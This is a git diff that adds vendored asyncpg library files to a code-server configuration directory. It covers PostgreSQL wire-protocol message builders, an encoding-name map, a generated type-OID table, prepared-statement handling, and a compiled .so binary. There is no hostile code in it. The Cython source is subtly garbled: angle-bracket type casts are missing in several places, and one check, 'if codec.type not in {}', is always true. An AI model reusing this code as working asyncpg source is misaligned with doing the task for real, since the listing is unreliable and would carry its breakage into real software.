buf.write_int16(0) + + buf.write_bytestring(b'client_encoding') + buf.write_bytestring("'{}'".format(self.encoding).encode('ascii')) + + buf.write_str('user', self.encoding) + buf.write_str(self.con_params.user, self.encoding) + + buf.write_str('database', self.encoding) + buf.write_str(self.con_params.database, self.encoding) + + if self.con_params.server_settings is not None: + for k, v in self.con_params.server_settings.items(): + buf.write_str(k, self.encoding) + buf.write_str(v, self.encoding) + + buf.write_bytestring(b'') + + # Send the buffer + outbuf = WriteBuffer() + outbuf.write_int32(buf.len() + 4) + outbuf.write_buffer(buf) + self._write(outbuf) + + cdef _send_parse_message(self, str stmt_name, str query): + cdef: + WriteBuffer msg + + self._ensure_connected() + msg = self._build_parse_message(stmt_name, query) + self._write(msg) + + cdef _prepare_and_describe(self, str stmt_name, str query): + cdef: + WriteBuffer packet + WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_PREPARE) + + packet = self._build_parse_message(stmt_name, query) + + buf = WriteBuffer.new_message(b'D') + buf.write_byte(b'S') + buf.write_str(stmt_name, self.encoding) + buf.end_message() + packet.write_buffer(buf) + + packet.write_bytes(FLUSH_MESSAGE) + + self._write(packet) + + cdef _send_bind_message(self, str portal_name, str stmt_name, + WriteBuffer bind_data, int32_t limit): + + cdef: + WriteBuffer packet + WriteBuffer buf + + buf = self._build_bind_message(portal_name, stmt_name, bind_data) + packet = buf + + buf = self._build_execute_message(portal_name, limit) + packet.write_buffer(buf) + + packet.write_bytes(SYNC_MESSAGE) + + self._write(packet) + + cdef _bind_execute(self, str portal_name, str stmt_name, + WriteBuffer bind_data, int32_t limit): + + cdef WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_BIND_EXECUTE) + + self.result = [] + + self._send_bind_message(portal_name, stmt_name, bind_data, limit) + + cdef bint _bind_execute_many(self, str portal_name, str stmt_name, + object bind_data, bint return_rows): + self._ensure_connected() + self._set_state(PROTOCOL_BIND_EXECUTE_MANY) + + self.result = [] if return_rows else None + self._discard_data = not return_rows + self._execute_iter = bind_data + self._execute_portal_name = portal_name + self._execute_stmt_name = stmt_name + return self._bind_execute_many_more(True) + + cdef bint _bind_execute_many_more(self, bint first=False): + cdef: + WriteBuffer packet + WriteBuffer buf + list buffers = [] + + # as we keep sending, the server may return an error early + if self.result_type == RESULT_FAILED: + self._write(SYNC_MESSAGE) + return False + + # collect up to four 32KB buffers to send + # https://github.com/MagicStack/asyncpg/pull/289#issuecomment-391215051 + while len(buffers) < _EXECUTE_MANY_BUF_NUM: + packet = WriteBuffer.new() + + # fill one 32KB buffer + while packet.len() < _EXECUTE_MANY_BUF_SIZE: + try: + # grab one item from the input + buf = next(self._execute_iter) + + # reached the end of the input + except StopIteration: + if first: + # if we never send anything, simply set the result + self._push_result() + else: + # otherwise, append SYNC and send the buffers + packet.write_bytes(SYNC_MESSAGE) + buffers.append(memoryview(packet)) + self._writelines(buffers) + return False + + # error in input, give up the buffers and cleanup + except Exception as ex: + self._bind_execute_many_fail(ex, first) + return False + + # all good, write to the buffer + first = False + packet.write_buffer( + self._build_bind_message( + self._execute_portal_name, + self._execute_stmt_name, + buf, + ) + ) + packet.write_buffer( + self._build_execute_message(self._execute_portal_name, 0, + ) + ) + + # collected one buffer + buffers.append(memoryview(packet)) + + # write to the wire, and signal the caller for more to send + self._writelines(buffers) + return True + + cdef _bind_execute_many_fail(self, object error, bint first=False): + cdef WriteBuffer buf + + self.result_type = RESULT_FAILED + self.result = error + if first: + self._push_result() + elif self.is_in_transaction(): + # we're in an explicit transaction, just SYNC + self._write(SYNC_MESSAGE) + else: + # In an implicit transaction, if `ignore_till_sync` is set, + # `ROLLBACK` will be ignored and `Sync` will restore the state; + # or the transaction will be rolled back with a warning saying + # that there was no transaction, but rollback is done anyway, + # so we could safely ignore this warning. + # GOTCHA: cannot use simple query message here, because it is + # ignored if `ignore_till_sync` is set. + buf = self._build_parse_message('', 'ROLLBACK') + buf.write_buffer(self._build_bind_message( + '', '', self._build_empty_bind_data())) + buf.write_buffer(self._build_execute_message('', 0)) + buf.write_bytes(SYNC_MESSAGE) + self._write(buf) + + cdef _execute(self, str portal_name, int32_t limit): + cdef WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_EXECUTE) + + self.result = [] + + buf = self._build_execute_message(portal_name, limit) + + buf.write_bytes(SYNC_MESSAGE) + + self._write(buf) + + cdef _bind(self, str portal_name, str stmt_name, + WriteBuffer bind_data): + + cdef WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_BIND) + + buf = self._build_bind_message(portal_name, stmt_name, bind_data) + + buf.write_bytes(SYNC_MESSAGE) + + self._write(buf) + + cdef _close(self, str name, bint is_portal): + cdef WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_CLOSE_STMT_PORTAL) + + buf = WriteBuffer.new_message(b'C') + + if is_portal: + buf.write_byte(b'P') + else: + buf.write_byte(b'S') + + buf.write_str(name, self.encoding) + buf.end_message() + + buf.write_bytes(SYNC_MESSAGE) + + self._write(buf) + + cdef _simple_query(self, str query): + cdef WriteBuffer buf + self._ensure_connected() + self._set_state(PROTOCOL_SIMPLE_QUERY) + buf = WriteBuffer.new_message(b'Q') + buf.write_str(query, self.encoding) + buf.end_message() + self._write(buf) + + cdef _copy_out(self, str copy_stmt): + cdef WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_COPY_OUT) + + # Send the COPY .. TO STDOUT using the SimpleQuery protocol. + buf = WriteBuffer.new_message(b'Q') + buf.write_str(copy_stmt, self.encoding) + buf.end_message() + self._write(buf) + + cdef _copy_in(self, str copy_stmt): + cdef WriteBuffer buf + + self._ensure_connected() + self._set_state(PROTOCOL_COPY_IN) + + buf = WriteBuffer.new_message(b'Q') + buf.write_str(copy_stmt, self.encoding) + buf.end_message() + self._write(buf) + + cdef _terminate(self): + cdef WriteBuffer buf + self._ensure_connected() + self._set_state(PROTOCOL_TERMINATING) + buf = WriteBuffer.new_message(b'X') + buf.end_message() + self._write(buf) + + cdef _write(self, buf): + raise NotImplementedError + + cdef _writelines(self, list buffers): + raise NotImplementedError + + cdef _decode_row(self, const char* buf, ssize_t buf_len): + pass + + cdef _set_server_parameter(self, name, val): + pass + + cdef _on_result(self): + pass + + cdef _on_notice(self, parsed): + pass + + cdef _on_notification(self, pid, channel, payload): + pass + + cdef _on_connection_lost(self, exc): + pass + + +SYNC_MESSAGE = bytes(WriteBuffer.new_message(b'S').end_message()) +FLUSH_MESSAGE = bytes(WriteBuffer.new_message(b'H').end_message()) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/cpythonx.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/cpythonx.pxd new file mode 100755 index 0000000..1c72988 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/cpythonx.pxd @@ -0,0 +1,19 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef extern from "Python.h": + int PyByteArray_Check(object) + + int PyMemoryView_Check(object) + Py_buffer *PyMemoryView_GET_BUFFER(object) + object PyMemoryView_GetContiguous(object, int buffertype, char order) + + Py_UCS4* PyUnicode_AsUCS4Copy(object) except NULL + object PyUnicode_FromKindAndData( + int kind, const void *buffer, Py_ssize_t size) + + int PyUnicode_4BYTE_KIND diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/encodings.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/encodings.pyx new file mode 100755 index 0000000..1463dbe --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/encodings.pyx @@ -0,0 +1,63 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +'''Map PostgreSQL encoding names to Python encoding names + +https://www.postgresql.org/docs/current/static/multibyte.html#CHARSET-TABLE +''' + +ENCODINGS_MAP = { + 'abc': 'cp1258', + 'alt': 'cp866', + 'euc_cn': 'euccn', + 'euc_jp': 'eucjp', + 'euc_kr': 'euckr', + 'koi8r': 'koi8_r', + 'koi8u': 'koi8_u', + 'shift_jis_2004': 'euc_jis_2004', + 'sjis': 'shift_jis', + 'sql_ascii': 'ascii', + 'vscii': 'cp1258', + 'tcvn': 'cp1258', + 'tcvn5712': 'cp1258', + 'unicode': 'utf_8', + 'win': 'cp1521', + 'win1250': 'cp1250', + 'win1251': 'cp1251', + 'win1252': 'cp1252', + 'win1253': 'cp1253', + 'win1254': 'cp1254', + 'win1255': 'cp1255', + 'win1256': 'cp1256', + 'win1257': 'cp1257', + 'win1258': 'cp1258', + 'win866': 'cp866', + 'win874': 'cp874', + 'win932': 'cp932', + 'win936': 'cp936', + 'win949': 'cp949', + 'win950': 'cp950', + 'windows1250': 'cp1250', + 'windows1251': 'cp1251', + 'windows1252': 'cp1252', + 'windows1253': 'cp1253', + 'windows1254': 'cp1254', + 'windows1255': 'cp1255', + 'windows1256': 'cp1256', + 'windows1257': 'cp1257', + 'windows1258': 'cp1258', + 'windows866': 'cp866', + 'windows874': 'cp874', + 'windows932': 'cp932', + 'windows936': 'cp936', + 'windows949': 'cp949', + 'windows950': 'cp950', +} + + +cdef get_python_encoding(pg_encoding): + return ENCODINGS_MAP.get(pg_encoding.lower(), pg_encoding.lower()) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/pgtypes.pxi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/pgtypes.pxi new file mode 100755 index 0000000..86f8e66 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/pgtypes.pxi @@ -0,0 +1,266 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +# GENERATED FROM pg_catalog.pg_type +# DO NOT MODIFY, use tools/generate_type_map.py to update + +DEF INVALIDOID = 0 +DEF MAXBUILTINOID = 9999 +DEF MAXSUPPORTEDOID = 5080 + +DEF BOOLOID = 16 +DEF BYTEAOID = 17 +DEF CHAROID = 18 +DEF NAMEOID = 19 +DEF INT8OID = 20 +DEF INT2OID = 21 +DEF INT4OID = 23 +DEF REGPROCOID = 24 +DEF TEXTOID = 25 +DEF OIDOID = 26 +DEF TIDOID = 27 +DEF XIDOID = 28 +DEF CIDOID = 29 +DEF PG_DDL_COMMANDOID = 32 +DEF JSONOID = 114 +DEF XMLOID = 142 +DEF PG_NODE_TREEOID = 194 +DEF SMGROID = 210 +DEF TABLE_AM_HANDLEROID = 269 +DEF INDEX_AM_HANDLEROID = 325 +DEF POINTOID = 600 +DEF LSEGOID = 601 +DEF PATHOID = 602 +DEF BOXOID = 603 +DEF POLYGONOID = 604 +DEF LINEOID = 628 +DEF CIDROID = 650 +DEF FLOAT4OID = 700 +DEF FLOAT8OID = 701 +DEF ABSTIMEOID = 702 +DEF RELTIMEOID = 703 +DEF TINTERVALOID = 704 +DEF UNKNOWNOID = 705 +DEF CIRCLEOID = 718 +DEF MACADDR8OID = 774 +DEF MONEYOID = 790 +DEF MACADDROID = 829 +DEF INETOID = 869 +DEF _TEXTOID = 1009 +DEF _OIDOID = 1028 +DEF ACLITEMOID = 1033 +DEF BPCHAROID = 1042 +DEF VARCHAROID = 1043 +DEF DATEOID = 1082 +DEF TIMEOID = 1083 +DEF TIMESTAMPOID = 1114 +DEF TIMESTAMPTZOID = 1184 +DEF INTERVALOID = 1186 +DEF TIMETZOID = 1266 +DEF BITOID = 1560 +DEF VARBITOID = 1562 +DEF NUMERICOID = 1700 +DEF REFCURSOROID = 1790 +DEF REGPROCEDUREOID = 2202 +DEF REGOPEROID = 2203 +DEF REGOPERATOROID = 2204 +DEF REGCLASSOID = 2205 +DEF REGTYPEOID = 2206 +DEF RECORDOID = 2249 +DEF CSTRINGOID = 2275 +DEF ANYOID = 2276 +DEF ANYARRAYOID = 2277 +DEF VOIDOID = 2278 +DEF TRIGGEROID = 2279 +DEF LANGUAGE_HANDLEROID = 2280 +DEF INTERNALOID = 2281 +DEF OPAQUEOID = 2282 +DEF ANYELEMENTOID = 2283 +DEF ANYNONARRAYOID = 2776 +DEF UUIDOID = 2950 +DEF TXID_SNAPSHOTOID = 2970 +DEF FDW_HANDLEROID = 3115 +DEF PG_LSNOID = 3220 +DEF TSM_HANDLEROID = 3310 +DEF PG_NDISTINCTOID = 3361 +DEF PG_DEPENDENCIESOID = 3402 +DEF ANYENUMOID = 3500 +DEF TSVECTOROID = 3614 +DEF TSQUERYOID = 3615 +DEF GTSVECTOROID = 3642 +DEF REGCONFIGOID = 3734 +DEF REGDICTIONARYOID = 3769 +DEF JSONBOID = 3802 +DEF ANYRANGEOID = 3831 +DEF EVENT_TRIGGEROID = 3838 +DEF JSONPATHOID = 4072 +DEF REGNAMESPACEOID = 4089 +DEF REGROLEOID = 4096 +DEF REGCOLLATIONOID = 4191 +DEF ANYMULTIRANGEOID = 4537 +DEF ANYCOMPATIBLEMULTIRANGEOID = 4538 +DEF PG_BRIN_BLOOM_SUMMARYOID = 4600 +DEF PG_BRIN_MINMAX_MULTI_SUMMARYOID = 4601 +DEF PG_MCV_LISTOID = 5017 +DEF PG_SNAPSHOTOID = 5038 +DEF XID8OID = 5069 +DEF ANYCOMPATIBLEOID = 5077 +DEF ANYCOMPATIBLEARRAYOID = 5078 +DEF ANYCOMPATIBLENONARRAYOID = 5079 +DEF ANYCOMPATIBLERANGEOID = 5080 + +ARRAY_TYPES = {_TEXTOID, _OIDOID} + +BUILTIN_TYPE_OID_MAP = { + ABSTIMEOID: 'abstime', + ACLITEMOID: 'aclitem', + ANYARRAYOID: 'anyarray', + ANYCOMPATIBLEARRAYOID: 'anycompatiblearray', + ANYCOMPATIBLEMULTIRANGEOID: 'anycompatiblemultirange', + ANYCOMPATIBLENONARRAYOID: 'anycompatiblenonarray', + ANYCOMPATIBLEOID: 'anycompatible', + ANYCOMPATIBLERANGEOID: 'anycompatiblerange', + ANYELEMENTOID: 'anyelement', + ANYENUMOID: 'anyenum', + ANYMULTIRANGEOID: 'anymultirange', + ANYNONARRAYOID: 'anynonarray', + ANYOID: 'any', + ANYRANGEOID: 'anyrange', + BITOID: 'bit', + BOOLOID: 'bool', + BOXOID: 'box', + BPCHAROID: 'bpchar', + BYTEAOID: 'bytea', + CHAROID: 'char', + CIDOID: 'cid', + CIDROID: 'cidr', + CIRCLEOID: 'circle', + CSTRINGOID: 'cstring', + DATEOID: 'date', + EVENT_TRIGGEROID: 'event_trigger', + FDW_HANDLEROID: 'fdw_handler', + FLOAT4OID: 'float4', + FLOAT8OID: 'float8', + GTSVECTOROID: 'gtsvector', + INDEX_AM_HANDLEROID: 'index_am_handler', + INETOID: 'inet', + INT2OID: 'int2', + INT4OID: 'int4', + INT8OID: 'int8', + INTERNALOID: 'internal', + INTERVALOID: 'interval', + JSONBOID: 'jsonb', + JSONOID: 'json', + JSONPATHOID: 'jsonpath', + LANGUAGE_HANDLEROID: 'language_handler', + LINEOID: 'line', + LSEGOID: 'lseg', + MACADDR8OID: 'macaddr8', + MACADDROID: 'macaddr', + MONEYOID: 'money', + NAMEOID: 'name', + NUMERICOID: 'numeric', + OIDOID: 'oid', + OPAQUEOID: 'opaque', + PATHOID: 'path', + PG_BRIN_BLOOM_SUMMARYOID: 'pg_brin_bloom_summary', + PG_BRIN_MINMAX_MULTI_SUMMARYOID: 'pg_brin_minmax_multi_summary', + PG_DDL_COMMANDOID: 'pg_ddl_command', + PG_DEPENDENCIESOID: 'pg_dependencies', + PG_LSNOID: 'pg_lsn', + PG_MCV_LISTOID: 'pg_mcv_list', + PG_NDISTINCTOID: 'pg_ndistinct', + PG_NODE_TREEOID: 'pg_node_tree', + PG_SNAPSHOTOID: 'pg_snapshot', + POINTOID: 'point', + POLYGONOID: 'polygon', + RECORDOID: 'record', + REFCURSOROID: 'refcursor', + REGCLASSOID: 'regclass', + REGCOLLATIONOID: 'regcollation', + REGCONFIGOID: 'regconfig', + REGDICTIONARYOID: 'regdictionary', + REGNAMESPACEOID: 'regnamespace', + REGOPERATOROID: 'regoperator', + REGOPEROID: 'regoper', + REGPROCEDUREOID: 'regprocedure', + REGPROCOID: 'regproc', + REGROLEOID: 'regrole', + REGTYPEOID: 'regtype', + RELTIMEOID: 'reltime', + SMGROID: 'smgr', + TABLE_AM_HANDLEROID: 'table_am_handler', + TEXTOID: 'text', + TIDOID: 'tid', + TIMEOID: 'time', + TIMESTAMPOID: 'timestamp', + TIMESTAMPTZOID: 'timestamptz', + TIMETZOID: 'timetz', + TINTERVALOID: 'tinterval', + TRIGGEROID: 'trigger', + TSM_HANDLEROID: 'tsm_handler', + TSQUERYOID: 'tsquery', + TSVECTOROID: 'tsvector', + TXID_SNAPSHOTOID: 'txid_snapshot', + UNKNOWNOID: 'unknown', + UUIDOID: 'uuid', + VARBITOID: 'varbit', + VARCHAROID: 'varchar', + VOIDOID: 'void', + XID8OID: 'xid8', + XIDOID: 'xid', + XMLOID: 'xml', + _OIDOID: 'oid[]', + _TEXTOID: 'text[]' +} + +BUILTIN_TYPE_NAME_MAP = {v: k for k, v in BUILTIN_TYPE_OID_MAP.items()} + +BUILTIN_TYPE_NAME_MAP['smallint'] = \ + BUILTIN_TYPE_NAME_MAP['int2'] + +BUILTIN_TYPE_NAME_MAP['int'] = \ + BUILTIN_TYPE_NAME_MAP['int4'] + +BUILTIN_TYPE_NAME_MAP['integer'] = \ + BUILTIN_TYPE_NAME_MAP['int4'] + +BUILTIN_TYPE_NAME_MAP['bigint'] = \ + BUILTIN_TYPE_NAME_MAP['int8'] + +BUILTIN_TYPE_NAME_MAP['decimal'] = \ + BUILTIN_TYPE_NAME_MAP['numeric'] + +BUILTIN_TYPE_NAME_MAP['real'] = \ + BUILTIN_TYPE_NAME_MAP['float4'] + +BUILTIN_TYPE_NAME_MAP['double precision'] = \ + BUILTIN_TYPE_NAME_MAP['float8'] + +BUILTIN_TYPE_NAME_MAP['timestamp with timezone'] = \ + BUILTIN_TYPE_NAME_MAP['timestamptz'] + +BUILTIN_TYPE_NAME_MAP['timestamp without timezone'] = \ + BUILTIN_TYPE_NAME_MAP['timestamp'] + +BUILTIN_TYPE_NAME_MAP['time with timezone'] = \ + BUILTIN_TYPE_NAME_MAP['timetz'] + +BUILTIN_TYPE_NAME_MAP['time without timezone'] = \ + BUILTIN_TYPE_NAME_MAP['time'] + +BUILTIN_TYPE_NAME_MAP['char'] = \ + BUILTIN_TYPE_NAME_MAP['bpchar'] + +BUILTIN_TYPE_NAME_MAP['character'] = \ + BUILTIN_TYPE_NAME_MAP['bpchar'] + +BUILTIN_TYPE_NAME_MAP['character varying'] = \ + BUILTIN_TYPE_NAME_MAP['varchar'] + +BUILTIN_TYPE_NAME_MAP['bit varying'] = \ + BUILTIN_TYPE_NAME_MAP['varbit'] diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/prepared_stmt.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/prepared_stmt.pxd new file mode 100755 index 0000000..369db73 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/prepared_stmt.pxd @@ -0,0 +1,39 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef class PreparedStatementState: + cdef: + readonly str name + readonly str query + readonly bint closed + readonly bint prepared + readonly int refs + readonly type record_class + readonly bint ignore_custom_codec + + + list row_desc + list parameters_desc + + ConnectionSettings settings + + int16_t args_num + bint have_text_args + tuple args_codecs + + int16_t cols_num + object cols_desc + bint have_text_cols + tuple rows_codecs + + cdef _encode_bind_msg(self, args, int seqno = ?) + cpdef _init_codecs(self) + cdef _ensure_rows_decoder(self) + cdef _ensure_args_encoder(self) + cdef _set_row_desc(self, object desc) + cdef _set_args_desc(self, object desc) + cdef _decode_row(self, const char* cbuf, ssize_t buf_len) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/prepared_stmt.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/prepared_stmt.pyx new file mode 100755 index 0000000..4145c66 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/prepared_stmt.pyx @@ -0,0 +1,395 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from asyncpg import exceptions + + +@cython.final +cdef class PreparedStatementState: + + def __cinit__( + self, + str name, + str query, + BaseProtocol protocol, + type record_class, + bint ignore_custom_codec + ): + self.name = name + self.query = query + self.settings = protocol.settings + self.row_desc = self.parameters_desc = None + self.args_codecs = self.rows_codecs = None + self.args_num = self.cols_num = 0 + self.cols_desc = None + self.closed = False + self.prepared = True + self.refs = 0 + self.record_class = record_class + self.ignore_custom_codec = ignore_custom_codec + + def _get_parameters(self): + cdef Codec codec + + result = [] + for oid in self.parameters_desc: + codec = self.settings.get_data_codec(oid) + if codec is None: + raise exceptions.InternalClientError( + 'missing codec information for OID {}'.format(oid)) + result.append(apg_types.Type( + oid, codec.name, codec.kind, codec.schema)) + + return tuple(result) + + def _get_attributes(self): + cdef Codec codec + + if not self.row_desc: + return () + + result = [] + for d in self.row_desc: + name = d[0] + oid = d[3] + + codec = self.settings.get_data_codec(oid) + if codec is None: + raise exceptions.InternalClientError( + 'missing codec information for OID {}'.format(oid)) + + name = name.decode(self.settings._encoding) + + result.append( + apg_types.Attribute(name, + apg_types.Type(oid, codec.name, codec.kind, codec.schema))) + + return tuple(result) + + def _init_types(self): + cdef: + Codec codec + set missing = set() + + if self.parameters_desc: + for p_oid in self.parameters_desc: + codec = self.settings.get_data_codec(p_oid) + if codec is None or not codec.has_encoder(): + missing.add(p_oid) + + if self.row_desc: + for rdesc in self.row_desc: + codec = self.settings.get_data_codec((rdesc[3])) + if codec is None or not codec.has_decoder(): + missing.add(rdesc[3]) + + return missing + + cpdef _init_codecs(self): + self._ensure_args_encoder() + self._ensure_rows_decoder() + + def attach(self): + self.refs += 1 + + def detach(self): + self.refs -= 1 + + def mark_closed(self): + self.closed = True + + def mark_unprepared(self): + if self.name: + raise exceptions.InternalClientError( + "named prepared statements cannot be marked unprepared") + self.prepared = False + + cdef _encode_bind_msg(self, args, int seqno = -1): + cdef: + int idx + WriteBuffer writer + Codec codec + + if not cpython.PySequence_Check(args): + if seqno >= 0: + raise exceptions.DataError( + f'invalid input in executemany() argument sequence ' + f'element #{seqno}: expected a sequence, got ' + f'{type(args).__name__}' + ) + else: + # Non executemany() callers do not pass user input directly, + # so bad input is a bug. + raise exceptions.InternalClientError( + f'Bind: expected a sequence, got {type(args).__name__}') + + if len(args) > 32767: + raise exceptions.InterfaceError( + 'the number of query arguments cannot exceed 32767') + + writer = WriteBuffer.new() + + num_args_passed = len(args) + if self.args_num != num_args_passed: + hint = 'Check the query against the passed list of arguments.' + + if self.args_num == 0: + # If the server was expecting zero arguments, it is likely + # that the user tried to parametrize a statement that does + # not support parameters. + hint += (r' Note that parameters are supported only in' + r' SELECT, INSERT, UPDATE, DELETE, MERGE and VALUES' + r' statements, and will *not* work in statements ' + r' like CREATE VIEW or DECLARE CURSOR.') + + raise exceptions.InterfaceError( + 'the server expects {x} argument{s} for this query, ' + '{y} {w} passed'.format( + x=self.args_num, s='s' if self.args_num != 1 else '', + y=num_args_passed, + w='was' if num_args_passed == 1 else 'were'), + hint=hint) + + if self.have_text_args: + writer.write_int16(self.args_num) + for idx in range(self.args_num): + codec = (self.args_codecs[idx]) + writer.write_int16(codec.format) + else: + # All arguments are in binary format + writer.write_int32(0x00010001) + + writer.write_int16(self.args_num) + + for idx in range(self.args_num): + arg = args[idx] + if arg is None: + writer.write_int32(-1) + else: + codec = (self.args_codecs[idx]) + try: + codec.encode(self.settings, writer, arg) + except (AssertionError, exceptions.InternalClientError): + # These are internal errors and should raise as-is. + raise + except exceptions.InterfaceError as e: + # This is already a descriptive error, but annotate + # with argument name for clarity. + pos = f'${idx + 1}' + if seqno >= 0: + pos = ( + f'{pos} in element #{seqno} of' + f' executemany() sequence' + ) + raise e.with_msg( + f'query argument {pos}: {e.args[0]}' + ) from None + except Exception as e: + # Everything else is assumed to be an encoding error + # due to invalid input. + pos = f'${idx + 1}' + if seqno >= 0: + pos = ( + f'{pos} in element #{seqno} of' + f' executemany() sequence' + ) + value_repr = repr(arg) + if len(value_repr) > 40: + value_repr = value_repr[:40] + '...' + + raise exceptions.DataError( + f'invalid input for query argument' + f' {pos}: {value_repr} ({e})' + ) from e + + if self.have_text_cols: + writer.write_int16(self.cols_num) + for idx in range(self.cols_num): + codec = (self.rows_codecs[idx]) + writer.write_int16(codec.format) + else: + # All columns are in binary format + writer.write_int32(0x00010001) + + return writer + + cdef _ensure_rows_decoder(self): + cdef: + list cols_names + object cols_mapping + tuple row + uint32_t oid + Codec codec + list codecs + + if self.cols_desc is not None: + return + + if self.cols_num == 0: + self.cols_desc = RecordDescriptor({}, ()) + return + + cols_mapping = collections.OrderedDict() + cols_names = [] + codecs = [] + for i from 0 <= i < self.cols_num: + row = self.row_desc[i] + col_name = row[0].decode(self.settings._encoding) + cols_mapping[col_name] = i + cols_names.append(col_name) + oid = row[3] + codec = self.settings.get_data_codec( + oid, ignore_custom_codec=self.ignore_custom_codec) + if codec is None or not codec.has_decoder(): + raise exceptions.InternalClientError( + 'no decoder for OID {}'.format(oid)) + if not codec.is_binary(): + self.have_text_cols = True + + codecs.append(codec) + + self.cols_desc = RecordDescriptor( + cols_mapping, tuple(cols_names)) + + self.rows_codecs = tuple(codecs) + + cdef _ensure_args_encoder(self): + cdef: + uint32_t p_oid + Codec codec + list codecs = [] + + if self.args_num == 0 or self.args_codecs is not None: + return + + for i from 0 <= i < self.args_num: + p_oid = self.parameters_desc[i] + codec = self.settings.get_data_codec( + p_oid, ignore_custom_codec=self.ignore_custom_codec) + if codec is None or not codec.has_encoder(): + raise exceptions.InternalClientError( + 'no encoder for OID {}'.format(p_oid)) + if codec.type not in {}: + self.have_text_args = True + + codecs.append(codec) + + self.args_codecs = tuple(codecs) + + cdef _set_row_desc(self, object desc): + self.row_desc = _decode_row_desc(desc) + self.cols_num = (len(self.row_desc)) + + cdef _set_args_desc(self, object desc): + self.parameters_desc = _decode_parameters_desc(desc) + self.args_num = (len(self.parameters_desc)) + + cdef _decode_row(self, const char* cbuf, ssize_t buf_len): + cdef: + Codec codec + int16_t fnum + int32_t flen + object dec_row + tuple rows_codecs = self.rows_codecs + ConnectionSettings settings = self.settings + int32_t i + FRBuffer rbuf + ssize_t bl + + frb_init(&rbuf, cbuf, buf_len) + + fnum = hton.unpack_int16(frb_read(&rbuf, 2)) + + if fnum != self.cols_num: + raise exceptions.ProtocolError( + 'the number of columns in the result row ({}) is ' + 'different from what was described ({})'.format( + fnum, self.cols_num)) + + dec_row = self.cols_desc.make_record(self.record_class, fnum) + for i in range(fnum): + flen = hton.unpack_int32(frb_read(&rbuf, 4)) + + if flen == -1: + val = None + else: + # Clamp buffer size to that of the reported field length + # to make sure that codecs can rely on read_all() working + # properly. + bl = frb_get_len(&rbuf) + if flen > bl: + frb_check(&rbuf, flen) + frb_set_len(&rbuf, flen) + codec = cpython.PyTuple_GET_ITEM(rows_codecs, i) + val = codec.decode(settings, &rbuf) + if frb_get_len(&rbuf) != 0: + raise BufferError( + 'unexpected trailing {} bytes in buffer'.format( + frb_get_len(&rbuf))) + frb_set_len(&rbuf, bl - flen) + + cpython.Py_INCREF(val) + recordcapi.ApgRecord_SET_ITEM(dec_row, i, val) + + if frb_get_len(&rbuf) != 0: + raise BufferError('unexpected trailing {} bytes in buffer'.format( + frb_get_len(&rbuf))) + + return dec_row + + +cdef _decode_parameters_desc(object desc): + cdef: + ReadBuffer reader + int16_t nparams + uint32_t p_oid + list result = [] + + reader = ReadBuffer.new_message_parser(desc) + nparams = reader.read_int16() + + for i from 0 <= i < nparams: + p_oid = reader.read_int32() + result.append(p_oid) + + return result + + +cdef _decode_row_desc(object desc): + cdef: + ReadBuffer reader + + int16_t nfields + + bytes f_name + uint32_t f_table_oid + int16_t f_column_num + uint32_t f_dt_oid + int16_t f_dt_size + int32_t f_dt_mod + int16_t f_format + + list result + + reader = ReadBuffer.new_message_parser(desc) + nfields = reader.read_int16() + result = [] + + for i from 0 <= i < nfields: + f_name = reader.read_null_str() + f_table_oid = reader.read_int32() + f_column_num = reader.read_int16() + f_dt_oid = reader.read_int32() + f_dt_size = reader.read_int16() + f_dt_mod = reader.read_int32() + f_format = reader.read_int16() + + result.append( + (f_name, f_table_oid, f_column_num, f_dt_oid, + f_dt_size, f_dt_mod, f_format)) + + return result diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.cpython-312-x86_64-linux-gnu.so b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.cpython-312-x86_64-linux-gnu.so new file mode 100755 index 0000000..8959ece Binary files /dev/null and b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.cpython-312-x86_64-linux-gnu.so differ diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pxd new file mode 100755 index 0000000..cd221fb --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pxd @@ -0,0 